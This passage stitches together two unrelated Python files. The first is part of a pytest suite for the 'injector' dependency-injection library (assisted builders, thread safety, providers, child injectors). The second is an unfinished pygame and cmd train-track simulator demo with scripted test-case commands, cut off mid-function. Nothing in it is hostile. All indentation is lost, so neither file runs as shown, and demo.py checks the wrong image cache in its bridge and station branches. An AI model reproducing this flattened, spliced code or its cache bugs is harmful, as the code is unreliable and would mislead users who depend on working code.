injector = Injector()
builder = injector.get(AssistedBuilder[NeedsAssistance])
obj = builder.build(b=123)
assert ((obj.a, obj.b) == (str(), 123))
def test_assisted_builder_works_when_injected():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.obj = builder.build(b=234)
injector = Injector()
x = injector.get(X)
assert ((x.obj.a, x.obj.b) == (str(), 234))
def test_assisted_builder_uses_bindings():
Interface = Key('Interface')
def configure(binder):
binder.bind(Interface, to=NeedsAssistance)
injector = Injector(configure)
builder = injector.get(AssistedBuilder[Interface])
x = builder.build(b=333)
assert ((type(x), x.b) == (NeedsAssistance, 333))
def test_assisted_builder_uses_concrete_class_when_specified():
class X:
pass
def configure(binder):
# meant only to show that provider isn't called
binder.bind(X, to=lambda: 1 / 0)
injector = Injector(configure)
builder = injector.get(ClassAssistedBuilder[X])
builder.build()
def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.builder = builder
i1, i2 = Injector(), Injector()
b1 = i1.get(X).builder
b2 = i2.get(X).builder
assert ((b1._injector, b2._injector) == (i1, i2))
def test_assisted_builder_injection_uses_the_same_binding_key_every_time():
# if we have different BindingKey for every AssistedBuilder(...) we will get memory leak
gen_key = lambda: BindingKey.create(AssistedBuilder[NeedsAssistance])
assert gen_key() == gen_key()
class TestThreadSafety:
def setup(self):
self.event = threading.Event()
def configure(binder):
binder.bind(str, to=lambda: self.event.wait() and 'this is str')
class XXX:
@inject
def __init__(self, s: str):
pass
self.injector = Injector(configure)
self.cls = XXX
def gather_results(self, count):
objects = []
lock = threading.Lock()
def target():
o = self.injector.get(self.cls)
with lock:
objects.append(o)
threads = [threading.Thread(target=target) for i in range(count)]
for t in threads:
t.start()
self.event.set()
for t in threads:
t.join()
return objects
def test_injection_is_thread_safe(self):
objects = self.gather_results(2)
assert (len(objects) == 2)
def test_singleton_scope_is_thread_safe(self):
self.injector.binder.bind(self.cls, scope=singleton)
a, b = self.gather_results(2)
assert (a is b)
def test_provider_and_scope_decorator_collaboration():
@provider
@singleton
def provider_singleton() -> int:
return 10
@singleton
@provider
def singleton_provider() -> int:
return 10
assert provider_singleton.__binding__.scope == SingletonScope
assert singleton_provider.__binding__.scope == SingletonScope
def test_injecting_into_method_of_object_that_is_falseish_works():
# regression test
class X(dict):
@inject
def __init__(self, s: str):
pass
injector = Injector()
injector.get(X)
def test_injection_fails_when_injector_cant_install_itself_into_an_object_with_slots():
try:
class ClassName:
__slots__ = ()
injector = Injector()
injector.get(ClassName)
except Exception as e:
check_exception_contains_stuff(e, ('ClassName', '__slots__'))
else:
assert False, 'Should have raised an exception and it didn\'t'
def test_deprecated_module_configure_injection():
class Test(Module):
@inject
def configure(self, binder, name: int):
pass
class Test2(Module):
@inject
def __init__(self, name: int):
pass
@inject
def configure(binder, name: int):
pass
for module in [Test, Test2, configure, Test()]:
with warnings.catch_warnings(record=True) as w:
print(module)
Injector(module)
assert len(w) == 1, w
def test_callable_provider_injection():
Name = Key("Name")
Message = Key("Message")
@inject
def create_message(name: Name):
return "Hello, " + name
def configure(binder):
binder.bind(Name, to="John")
binder.bind(Message, to=create_message)
injector = Injector([configure])
msg = injector.get(Message)
assert msg == "Hello, John"
def test_providerof():
counter = [0]
def provide_str():
counter[0] += 1
return 'content'
def configure(binder):
binder.bind(str, to=provide_str)
injector = Injector(configure)
assert counter[0] == 0
provider = injector.get(ProviderOf[str])
assert counter[0] == 0
assert provider.get() == 'content'
assert counter[0] == 1
assert provider.get() == injector.get(str)
assert counter[0] == 3
def test_providerof_cannot_be_bound():
def configure(binder):
binder.bind(ProviderOf[int], to=InstanceProvider(None))
with pytest.raises(Exception):
Injector(configure)
def test_providerof_is_safe_to_use_with_multiple_injectors():
def configure1(binder):
binder.bind(int, to=1)
def configure2(binder):
binder.bind(int, to=2)
injector1 = Injector(configure1)
injector2 = Injector(configure2)
provider_of = ProviderOf[int]
provider1 = injector1.get(provider_of)
provider2 = injector2.get(provider_of)
assert provider1.get() == 1
assert provider2.get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
class InjectMe:
pass
def configure(binder):
binder.bind(InjectMe, to=InstanceProvider(InjectMe()))
injector = Injector(configure, auto_bind=False)
# This line used to fail with:
# Traceback (most recent call last):
# File "/projects/injector/injector_test.py", line 1171,
# in test_auto_bind_disabled_regressions
# injector.get(ProviderOf(InjectMe))
# File "/projects/injector/injector.py", line 687, in get
# binding = self.binder.get_binding(None, key)
# File "/projects/injector/injector.py", line 459, in get_binding
# raise UnsatisfiedRequirement(cls, key)
# UnsatisfiedRequirement: unsatisfied requirement on
# <injector.ProviderOf object at 0x10ff01550>
injector.get(ProviderOf[InjectMe])
# This used to fail with an error similar to the ProviderOf one
injector.get(ClassAssistedBuilder[InjectMe])
def test_binding_an_instance_regression():
text = b'hello'.decode()
def configure(binder):
# Yes, this binding doesn't make sense strictly speaking but
# it's just a sample case.
binder.bind(bytes, to=text)
injector = Injector(configure)
# This used to return empty bytes instead of the expected string
assert injector.get(bytes) == text
def test_class_assisted_builder_of_partially_injected_class_old():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_implicit_injection_for_python3():
class A:
pass
class B:
@inject
def __init__(self, a:A):
self.a = a
class C:
@inject
def __init__(self, b:B):
self.b = b
injector = Injector()
c = injector.get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
def test_annotation_based_injection_works_in_provider_methods():
class MyModule(Module):
def configure(self, binder):
binder.bind(int, to=42)
@provider
def provide_str(self, i: int) -> str:
return str(i)
@singleton
@provider
def provide_object(self) -> object:
return object()
injector = Injector(MyModule)
assert injector.get(str) == '42'
assert injector.get(object) is injector.get(object)
def test_assisted_building_is_supported():
class Fetcher:
def fetch(self, user_id):
assert user_id == 333
return {'name': 'John'}
class Processor:
@noninjectable('provider_id')
@inject
@noninjectable('user_id')
def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
assert provider_id == 'not injected'
data = fetcher.fetch(user_id)
self.name = data['name']
def configure(binder):
binder.bind(int, to=897)
binder.bind(str, to='injected')
injector = Injector(configure)
processor_builder = injector.get(AssistedBuilder[Processor])
with pytest.raises(CallError):
processor_builder.build()
processor = processor_builder.build(user_id=333, provider_id='not injected')
assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
with pytest.raises(UnknownArgument):
class A:
@inject
@noninjectable('c')
def __init__(self, b: str):
self.b = b
def test_can_create_instance_with_untyped_noninjectable_argument():
class Parent:
@inject
@noninjectable('child1', 'child2')
def __init__(self, child1, *, child2):
self.child1 = child1
self.child2 = child2
injector = Injector()
parent_builder = injector.get(AssistedBuilder[Parent])
parent = parent_builder.build(child1='injected1', child2='injected2')
assert parent.child1 == 'injected1'
assert parent.child2 == 'injected2'
def test_implicit_injection_fails_when_annotations_are_missing():
class A:
def __init__(self, n):
self.n = n
injector = Injector()
with pytest.raises(CallError):
injector.get(A)
def test_injection_works_in_presence_of_return_value_annotation():
# Code with PEP 484-compatible type hints will have __init__ methods
# annotated as returning None[1] and this didn't work well with Injector.
#
# [1] https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
class A:
@inject
def __init__(self, s: str) -> None:
self.s = s
def configure(binder):
binder.bind(str, to='this is string')
injector = Injector([configure])
# Used to fail with:
# injector.UnknownProvider: couldn't determine provider for None to None
a = injector.get(A)
# Just a sanity check, if the code above worked we're almost certain
# we're good but just in case the return value annotation handling changed
# something:
assert a.s == 'this is string'
def test_things_dont_break_in_presence_of_args_or_kwargs():
class A:
@inject
def __init__(self, s: str, *args: int, **kwargs: str):
assert not args
assert not kwargs
injector = Injector()
# The following line used to fail with something like this:
# Traceback (most recent call last):
# File "/ve/injector/injector_test_py3.py", line 192,
# in test_things_dont_break_in_presence_of_args_or_kwargs
# injector.get(A)
# File "/ve/injector/injector.py", line 707, in get
# result = scope_instance.get(key, binding.provider).get(self)
# File "/ve/injector/injector.py", line 142, in get
# return injector.create_object(self._cls)
# File "/ve/injector/injector.py", line 744, in create_object
# init(instance, **additional_kwargs)
# File "/ve/injector/injector.py", line 1082, in inject
# kwargs=kwargs
# File "/ve/injector/injector.py", line 851, in call_with_injection
# **dependencies)
# File "/ve/injector/injector_test_py3.py", line 189, in __init__
# assert not kwargs
# AssertionError: assert not {'args': 0, 'kwargs': ''}
injector.get(A)
def test_forward_references_in_annotations_are_handled():
# See https://www.python.org/dev/peps/pep-0484/#forward-references for details
def configure(binder):
binder.bind(X, to=X('hello'))
@inject
def fun(s: 'X') -> 'X':
return s
# The class needs to be module-global in order for the string -> object
# resolution mechanism to work. I could make it work with locals but it
# doesn't seem worth it.
global X
class X:
def __init__(self, message: str) -> None:
self.message = message
try:
injector = Injector(configure)
injector.call_with_injection(fun).message == 'hello'
finally:
del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
@inject
def fun(a: Any) -> None:
pass
injector = Injector()
# This was the exception before:
#
# TypeError: Cannot instantiate <class 'typing.AnyMeta'>
#
# Now:
#
# injector.CallError: Call to AnyMeta.__new__() failed: Cannot instantiate
# <class 'typing.AnyMeta'> (injection stack: ['injector_test_py3'])
#
# In this case the injection stack doesn't provide too much information but
# it quickly gets helpful when the stack gets deeper.
with pytest.raises((CallError, TypeError)):
injector.call_with_injection(fun)
def test_optionals_are_ignored_for_now():
@inject
def fun(s: str = None):
return s
assert Injector().call_with_injection(fun) == ''
def test_class_assisted_builder_of_partially_injected_class():
class A:
pass
class B:
@inject
def __init__(self, a: A, b: str):
self.a = a
self.b = b
class C:
@inject
def __init__(self, a: A, builder: ClassAssistedBuilder[B]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, B)
assert isinstance(c.b.a, A)
# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
TestKey = Key('TestKey')
TestKey2 = Key('TestKey2')
def parent_module(binder):
binder.bind(TestKey, to=object, scope=singleton)
def first_child_module(binder):
binder.bind(TestKey2, to=object, scope=singleton)
def second_child_module(binder):
binder.bind(TestKey2, to='marker', scope=singleton)
injector = Injector(modules=[parent_module])
first_child_injector = injector.create_child_injector(modules=[first_child_module])
second_child_injector = injector.create_child_injector(modules=[second_child_module])
assert first_child_injector.get(TestKey) is first_child_injector.get(TestKey)
assert first_child_injector.get(TestKey) is second_child_injector.get(TestKey)
assert first_child_injector.get(TestKey2) is not second_child_injector.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
class CustomSingletonScope(SingletonScope):
pass
custom_singleton = ScopeDecorator(CustomSingletonScope)
def parent_module(binder):
binder.bind(str, to='parent value', scope=custom_singleton)
def child_module(binder):
binder.bind(str, to='child value', scope=custom_singleton)
parent = Injector(modules=[parent_module])
child = parent.create_child_injector(modules=[child_module])
print('parent, child: %s, %s' % (parent, child))
assert parent.get(str) == 'parent value'
assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
def test_inject_decorator_does_not_break_manual_construction_of_pyqt_objects():
class PyQtFake:
@inject
def __init__(self):
pass
def __getattribute__(self, item):
if item == '__injector__':
raise RuntimeError(
'A PyQt class would raise this exception if getting '
'self.__injector__ before __init__ is called and '
'self.__injector__ has not been set by Injector.')
return object.__getattribute__(self, item)
instance = PyQtFake() # This used to raise the exception
assert isinstance(instance, PyQtFake)
def test_using_an_assisted_builder_with_a_provider_raises_an_injector_error():
class A:
pass
class MyModule(Module):
@provider
def provide_a(self, builder: AssistedBuilder[A]) -> A:
return builder.build()
injector = Injector(MyModule)
with pytest.raises(Error):
injector.get(A)
def test_newtype_integration_works():
UserID = NewType('UserID', int)
def configure(binder):
binder.bind(UserID, to=123)
injector = Injector([configure])
assert injector.get(UserID) == 123
|
demo.py | import pygame as pygame
from pygame import image
from pygame.locals import *
import trainLib as lib
import time
import cmd, sys
import threading as th
# globals
globalGrid = None
stopDisplay = False
isDisplaying = False
displayThread = None
isDirty = False # needs sync across pygame and cmd threads.
trainPosRow = -1 # needs sync
trainPosCol = -1 # needs sync
train = None
tell = True
BLACK = (0, 0, 0)
WHITE = (200, 200, 200)
imageWidth = 200
#WINDOW_HEIGHT = 800
#WINDOW_WIDTH = 800
def rot_center(image, angle):
loc = image.get_rect().center
rot_sprite = pygame.transform.rotate(image, angle)
rot_sprite.get_rect().center = loc
return rot_sprite
# Reg Reg Rig Lef
# x2S1 x1S3 Lc x2S2
# st br x1S1 Lc
# x3Ri x1S1 Lef Reg
def pygameDisplay(threadName, row, col):
global SCREEN, CLOCK
pygame.init()
WINDOW_HEIGHT = row*200
WINDOW_WIDTH = col*200
SCREEN = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))
CLOCK = pygame.time.Clock()
SCREEN.fill(BLACK)
# Prepare images to display later.
regularImg = pygame.image.load("straightRoad.png")
bgImg = pygame.image.load("bg.png")
rightImage = pygame.image.load("rightTurn.png")
switch1Img = pygame.image.load("switch1.png")
switch2Img = pygame.image.load("switch2.png")
switch3Img = pygame.image.load("switch3.png")
levelCrossingImg = pygame.image.load("levelCrossing.png")
stationImg = pygame.image.load("station.png")
bridgeImg = pygame.image.load("bridge.png")
trainImg = pygame.image.load("train.png")
leftImage = pygame.image.load("rightTurn.png")
leftImage = rot_center(leftImage, -90)
topLeftRect = regularImg.get_rect()
global globalGrid
view = []
regularImgCache = {0 : regularImg}
rightImgCache = {0 : rightImage}
leftImgCache = {0 : leftImage}
switch1ImgCache = {0: switch1Img}
switch2ImgCache = {0: switch2Img}
switch3ImgCache = {0: switch3Img}
levelCrossingImgCache = {0: levelCrossingImg}
stationImgCache = {0 : stationImg}
bridgeImgCache = {0: bridgeImg}
trainImgCache = {0: trainImg}
for i in range(0, globalGrid.row):
view.append([])
for j in range(0, globalGrid.col):
elm = globalGrid.grid[i][j]
# print(elm, type(elm), isinstance(elm, lib.CellElement))
if(isinstance(elm, lib.RegularRoad)):
if(elm.visuals == '|'):
view[i].append(regularImg)
elif(elm.visuals == 'R'):
view[i].append(rightImage)
elif(elm.visuals == 'L'):
view[i].append(leftImage)
else:
view[i].append(bgImg)
elif(isinstance(elm, lib.SwitchRoad)):
if(elm.switchType == 1):
view[i].append(switch1Img)
elif(elm.switchType == 2):
view[i].append(switch2Img)
elif(elm.switchType == 3):
view[i].append(switch3Img)
else:
return
# print("switch type not set error.")
elif(isinstance(elm, lib.LevelCrossing)):
view[i].append(levelCrossingImg)
elif(isinstance(elm, lib.BridgeCrossing)):
view[i].append(bridgeImg)
elif(isinstance(elm, lib.Station)):
view[i].append(stationImg)
else: # unknown type of cell
# print("this is bg")
view[i].append(bgImg)
trainRect = trainImg.get_rect()
trainRect = pygame.Rect.move(topLeftRect, -200, -200)
i = 0
global stopDisplay, isDirty, trainPosRow, trainPosCol
while stopDisplay == False:
if(isDirty == True):
isDirty = False
for i in range(0, globalGrid.row):
for j in range(0, globalGrid.col):
elm = globalGrid.grid[i][j]
# print(elm, type(elm), isinstance(elm, lib.CellElement))
if(isinstance(elm, lib.RegularRoad)):
if(elm.visuals == '|'):
if(elm.rotationCount in regularImgCache):
# use that img
view[i][j] = regularImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("straightRoad.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
regularImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.visuals == 'R'):
if(elm.rotationCount in rightImgCache):
# use that img
view[i][j] = rightImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("rightTurn.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
rightImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.visuals == 'L'):
if(elm.rotationCount in leftImgCache):
# use that img
view[i][j] = leftImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("rightTurn.png")
rotatedImg = rot_center(rotatedImg, -90 * (elm.rotationCount + 1))
leftImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else:
view[i][j] =(bgImg)
elif(isinstance(elm, lib.SwitchRoad)):
if(elm.switchType == 1):
if(elm.rotationCount in switch1ImgCache):
# use that img
view[i][j] = switch1ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch1.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch1ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.switchType == 2):
if(elm.rotationCount in switch2ImgCache):
# use that img
view[i][j] = switch2ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch2.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch2ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(elm.switchType == 3):
if(elm.rotationCount in switch3ImgCache):
# use that img
view[i][j] = switch3ImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("switch3.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
switch3ImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else:
return
# print("switch type not set error.")
elif(isinstance(elm, lib.LevelCrossing)):
if(elm.rotationCount in levelCrossingImgCache):
# use that img
view[i][j] = levelCrossingImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("levelCrossing.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
levelCrossingImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(isinstance(elm, lib.BridgeCrossing)):
if(elm.rotationCount in levelCrossingImgCache):
# use that img
view[i][j] = bridgeImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("bridge.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
bridgeImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
elif(isinstance(elm, lib.Station)):
if(elm.rotationCount in levelCrossingImgCache):
# use that img
view[i][j] = stationImgCache[elm.rotationCount]
else:
#create that img and save it there
rotatedImg = pygame.image.load("station.png")
rotatedImg = rot_center(rotatedImg, -90 * elm.rotationCount)
stationImgCache[elm.rotationCount] = rotatedImg
view[i][j] = (rotatedImg)
else: # unknown type of cell
view[i].append(bgImg)
# update view
if(trainPosCol != -1 and trainPosRow != -1):
trainRect = pygame.Rect.move(topLeftRect, trainPosCol * imageWidth, trainPosRow * imageWidth)
drawGrid(view, topLeftRect)
# draw train On top
SCREEN.blit(trainImg, trainRect)
pygame.display.flip()
pygame.display.update()
time.sleep(0.02)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
elif(event.type == KEYDOWN):
if(event.key == K_q):
pygame.quit()
pygame.quit()
def updateView(view):
return
def getRect(row, col):
# global imageWidth
imageWidth = 200
x = col * imageWidth
y = row * imageWidth
return pygame.Rect(0, 0, x, y)
def drawGrid(view, topLeft):
global globalGrid, SCREEN, imageWidth
for i in range(0, globalGrid.row):
for j in range(0, globalGrid.col):
SCREEN.blit(view[i][j], pygame.Rect.move(topLeft, j * imageWidth, i * imageWidth))
class TrainSimCell(cmd.Cmd):
intro = 'Welcome to the TrainSim shell. Type help or ? to list commands.\n'
prompt = '(trainSim) '
file = None
#test cases
def do_testcase1(self,arg):
'''
It tries to create grids at different sizes, get error messages first, finally gives the right command and diplay grid.
'''
global tell
tell = False
print("give grid size out of bounds:")
time.sleep(2)
self.do_creategrid("9 15")
time.sleep(2)
print("\n")
print("give grid size 0:")
time.sleep(2)
self.do_creategrid("0 0")
time.sleep(2)
print("\n")
print("give grid size appropirately:")
time.sleep(2)
print("check the opened window ->")
time.sleep(2)
self.do_creategrid("4 5")
self.do_display([])
time.sleep(1)
tell = True
def do_testcase2(self, arg):
'''
Create a 4x4 grid and add each element type at some positions.
'''
global tell
tell = False
print("Firrst, let's try add elements before createing a grid:")
time.sleep(2)
self.do_addelm("0 0 regular")
time.sleep(2)
print("Ok, grid is created but what if we want to add an elemnet not defined?")
self.do_creategrid("4 4")
time.sleep(2)
self.do_addelm("0 0 people")
time.sleep(2)
print(" what if we want to add an elemnet a not valid cell?")
time.sleep(2)
self.do_addelm("7 7 regular")
time.sleep(2)
print("Now, it is time to add some right elements!")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 1 rightturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 2 leftturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 3 switch1")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 0 switch2")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 switch3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 levelcrossing")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 3 bridge")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 1 station")
time.sleep(1)
self.do_display([])
tell = True
def do_testcase3(self,arg):
'''
Display remove functionality
'''
global tell
tell = False
print("First, let's try to remove elements before createing a grid:")
time.sleep(2)
self.do_removeelm("0 0")
time.sleep(2)
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(2)
print("Now, it is time to add some elements!")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("0 0 switch3")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("1 1 rightturn")
time.sleep(2)
self.do_display([])
time.sleep(2)
self.do_addelm("1 2 bridge")
time.sleep(2)
self.do_display([])
print("What happens if we wanna remove an empty tile?")
time.sleep(2)
self.do_removeelm("3 3")
time.sleep(2)
print("Let's delete an existing cell")
time.sleep(2)
self.do_removeelm("1 2")
time.sleep(2)
self.do_display([])
tell = True
def do_testcase4(self,arg):
'''
Display rotation functionality
'''
global tell
tell = False
print("First, let's try to rotate something before createing a grid:")
time.sleep(2)
self.do_rotate("1 2 3")
time.sleep(2)
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(2)
print("Now, it is time to add some elements!")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 switch3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 rightturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 station")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 3 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 2 switch1")
time.sleep(1)
self.do_display([])
time.sleep(2)
print("Look at the window! Something will be happen")
time.sleep(2)
self.do_rotate("1 1 2")
time.sleep(2)
self.do_display([])
self.do_rotate("2 0 0")
time.sleep(2)
self.do_display([])
self.do_rotate("1 1 3")
time.sleep(2)
self.do_display([])
self.do_rotate("2 1 1")
time.sleep(2)
self.do_display([])
self.do_rotate("3 2 2")
time.sleep(2)
self.do_display([])
tell = True
def do_testcase5(self, arg):
'''
Displays the getduration & getstop functionality
'''
global tell
tell = False
self.do_creategrid("4 4")
print("Ok, grid is created.")
time.sleep(1)
self.do_addelm("0 0 switch3")
self.do_addelm("1 1 rightturn")
self.do_addelm("2 0 station")
self.do_addelm("1 3 regular")
self.do_addelm("2 2 switch1")
self.do_display([])
time.sleep(1)
print("Let's check values for them")
time.sleep(1)
self.do_getduration("0 0 north")
time.sleep(1)
self.do_getstop("0 0 north")
time.sleep(1)
self.do_getduration("1 1 north")
time.sleep(1)
self.do_getstop("1 1 north")
time.sleep(1)
self.do_getduration("2 0 north")
time.sleep(1)
self.do_getstop("2 0 north")
time.sleep(1)
self.do_getduration("1 3 north")
time.sleep(1)
self.do_getstop("1 3 north")
time.sleep(1)
self.do_getduration("2 2 north")
time.sleep(1)
self.do_getstop("2 2 north")
time.sleep(1)
tell = True
def do_testcase6(self,arg):
'''
Display nextcell & switchstate functionality
'''
self.do_creategrid("4 5")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(2)
self.do_display([])
time.sleep(2)
print("next cell when enter south to the cell 1 0 -> switch3 element \
(should be 0 0 regular):")
time.sleep(2)
self.do_getnextcell("1 0 south")
time.sleep(2)
print("next cell when enter east to the cell 1 0 -> switch3 elemnt \
(should be 2 0 regular):")
time.sleep(2)
self.do_getnextcell("1 0 east")
time.sleep(2)
print("active piece of switch3 when changeswitchstate 1 time \
(should be R ):")
time.sleep(2)
self.do_changeswitchstate("1 0")
time.sleep(2)
print("new nextcell of switch3 when enter south: \
(Shoud be 1 1 switch2)")
self.do_getnextcell("1 0 south")
time.sleep(2)
print("next cell of switch3 when rotate 1 time entering west\
(should be 2 0 regular):")
time.sleep(1)
self.do_rotate("1 1 0")
time.sleep(1)
self.do_getnextcell("1 0 west")
time.sleep(1)
tell = True
return
def do_testcase7(self,arg):
'''
Create a train at different cells
'''
global tell
tell = False
self.do_creategrid("4 5")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(1)
self.do_display([])
print("it is time locate trains at some cells.")
time.sleep(1.5)
print("at cel 0 0:")
time.sleep(1.5)
self.do_entercell("0 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 0:")
time.sleep(1.5)
self.do_entercell("1 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 1:")
time.sleep(1.5)
self.do_entercell("1 1 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 1 2:")
time.sleep(1.5)
self.do_entercell("1 2 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("at cel 3 0 which is a bacground, empty tile:")
time.sleep(1.5)
self.do_entercell("3 0 2 north")
time.sleep(1.5)
self.do_display([])
time.sleep(1)
tell = True
def do_testcase8(self,arg):
'''
Display the advancetrain functionality, which moves the train
'''
global tell
tell = False
self.do_creategrid("4 4")
self.do_addelm("0 0 regular")
self.do_addelm("0 1 regular")
self.do_addelm("0 2 rightturn")
self.do_addelm("2 0 regular")
self.do_addelm("1 0 switch3")
self.do_addelm("1 1 switch2")
self.do_addelm("1 2 switch1")
print("grid is created")
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
print("it is time locate a trains at cell 0 0.")
time.sleep(1.5)
self.do_entercell("0 0 2 north")
time.sleep(1.5)
print("Let's move!")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1)
self.do_getstatus("1 0")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1)
self.do_getstatus("2 0")
time.sleep(1.5)
self.do_advancetrain([])
time.sleep(1.5)
self.do_display([])
time.sleep(1.5)
tell = True
def do_testcase9(self,args):
'''
it contains some commands to crate a visual move
'''
global tell
tell = False
self.do_creategrid("3 3")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 0 switch2")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 1 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("0 2 leftturn")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 0 bridge")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 1 levelcrossing")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("1 2 regular")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_addelm("2 0 station")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_rotate("1 0 1")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_rotate("1 1 0")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_entercell("2 0 2 south")
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
self.do_advancetrain([])
time.sleep(1)
self.do_display([])
time.sleep(1)
tell = True
def do_getduration(self,arg):
#For now, it just returns the default value and the direction does not matter as long as it is one of the four main directions.
'''
Usage: Enter coordinates (as row column order) and enter direction (lower-case). Exp: getduration 0 0 north
'''
global globalGrid
dirs = { "north" : 0, "east" : 1, "south" : 2 , "west" : 3}
tupleArgs = arg.split()
row = int(tupleArgs[0])
col = int(tupleArgs[1])
entdir = tupleArgs[2]
if(not globalGrid):
print("Please create a grid before hand.")
return
cell = globalGrid.grid[row][col]
if(entdir in dirs.keys()):
if(cell.visuals == '_'):
print("Opps, there is no cell element in that position. Please try again.")
return
else:
duration = cell.getDuration(dirs[entdir])
print("duration for cell: ", (row,col), "is:", duration)
else:
print("Please enter a valid direction.")
def do_getstop(self,arg):
'''
Usage: Enter row col coordinates and entdir. Exp: getstop 0 0 north
'''
#For now, it just returns the default value and the direction does not matter as long as it is one of the four main directions.
global globalGrid
